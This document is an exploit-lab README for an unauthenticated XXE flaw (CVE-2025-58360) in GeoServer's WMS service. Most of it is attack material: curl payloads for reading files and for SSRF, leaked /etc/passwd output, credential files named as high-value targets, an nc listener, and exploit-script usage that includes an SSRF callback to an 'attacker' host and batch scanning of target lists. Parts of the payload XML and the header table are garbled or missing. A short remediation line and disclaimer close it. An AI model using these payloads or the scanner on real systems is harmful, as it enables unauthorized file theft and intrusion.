Share
## https://sploitus.com/exploit?id=184C78DE-1DF5-53A2-8049-589E479FD4BF
# CVE-2025-58360: GeoServer XXE Lab

> **Unauthenticated XML External Entity (XXE) Injection in GeoServer OWS/WMS Services**

**CVSS:** 9.8 CRITICAL  
**Affected:**  SLDHandler.parse()     |
|   -> SLDParser.parseSLD()   |  File/SSRF
```

## Quick Start

```bash
# Start both vulnerable and patched instances
docker-compose up -d

# Vulnerable: http://localhost:8080/geoserver
# Patched:    http://localhost:8081/geoserver

# Wait ~60 seconds for startup
```

**Default Credentials:** `admin` / `geoserver`

---

## Exploitation

### File Read

```bash
curl -s -X POST \
  -H "Content-Type: text/xml" \
  -d '

]>

  
    &xxe;
  
' \
  "http://localhost:8080/geoserver/ows?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90"
```

**Vulnerable Response:**
```xml

  Unknown layer: root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  ...

```

**Patched Response:**
```xml

  Entity resolution disallowed for file:///etc/passwd

```

### High-Value Targets

```
file:///opt/geoserver_data/security/usergroup/default/users.xml
file:///opt/geoserver_data/global.xml
```

### Directory Listing

Java's `file://` handler reads directories as newline-separated file lists:

```bash
# List root directory
python3 exploit.py -u http://localhost:8080 --file /

# Enumerate geoserver data
python3 exploit.py -u http://localhost:8080 --file /opt/geoserver_data/
python3 exploit.py -u http://localhost:8080 --file /opt/geoserver_data/security/
```

**Output:**
```
__cacert_entrypoint.sh
.dockerenv
bin
boot
dev
etc
home
...
```

This allows full filesystem enumeration before targeting specific files.

### SSRF

```bash
# Start listener
nc -lvnp 9999

# Send payload
curl -s -X POST \
  -H "Content-Type: text/xml" \
  -d '

]>

  
    &xxe;
  
' \
  "http://localhost:8080/geoserver/ows?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90"
```

---

## Using the Exploit Script

```bash
# Version check
python3 exploit.py -u http://localhost:8080

# Safe probe (no data exfil)
python3 exploit.py -u http://localhost:8080 --probe

# File read
python3 exploit.py -u http://localhost:8080 --file /etc/passwd

# SSRF
python3 exploit.py -u http://localhost:8080 --ssrf http://attacker:9999/callback

# Verbose mode
python3 exploit.py -u http://localhost:8080 --file /etc/passwd -v

# Batch scan
python3 exploit.py --list targets.txt --output vulnerable.txt
```

---

## Lab Contents

```
geoserver-xxe-lab/
โ”œโ”€โ”€ README.md
โ”œโ”€โ”€ docker-compose.yml
โ””โ”€โ”€ exploit.py
```

---

## Remediation

Upgrade to GeoServer 2.25.6+, 2.26.2+, or 2.27.0+

---

## Disclaimer

For authorized security testing and educational purposes only.

---

**El Perro Joke**